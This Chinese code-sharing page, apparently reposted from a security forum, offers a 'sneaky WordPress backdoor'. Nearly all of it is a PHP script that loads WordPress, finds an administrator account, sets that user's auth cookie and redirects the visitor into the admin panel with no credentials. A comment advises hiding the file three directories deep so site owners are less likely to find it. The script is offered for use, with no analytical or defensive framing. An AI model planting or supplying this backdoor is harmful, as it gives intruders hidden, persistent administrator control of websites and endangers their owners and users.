首页 > 代码库 > 猥琐的wordpress后门分享
猥琐的wordpress后门分享
https://www.t00ls.net/thread-37312-1-1.html
一个可以自动调用管理员帐号登录wordpress后台的方法。
<?php
require(‘../../../wp-blog-header.php‘); //我基本都是放到3级目录下。也可以放到根目录,但是容易被发现。
$query_str = "SELECT ID FROM $wpdb->users";
$user_ids = $wpdb->get_results($query_str);
foreach ($user_ids as $uid) {
$user_id = $uid->ID;
if (user_can($user_id, ‘administrator‘)) {
$user_info = get_userdata($user_id);
$user_login = $user_info->user_login;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action(‘wp_login‘, $user_login);
echo "You are logged in as $user_login";
if (function_exists(‘get_admin_url‘)) {
wp_redirect(get_admin_url());
} else {
wp_redirect(get_bloginfo(‘wpurl‘) . ‘/wp-admin‘);
}
exit;
}
}
?>
猥琐的wordpress后门分享
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。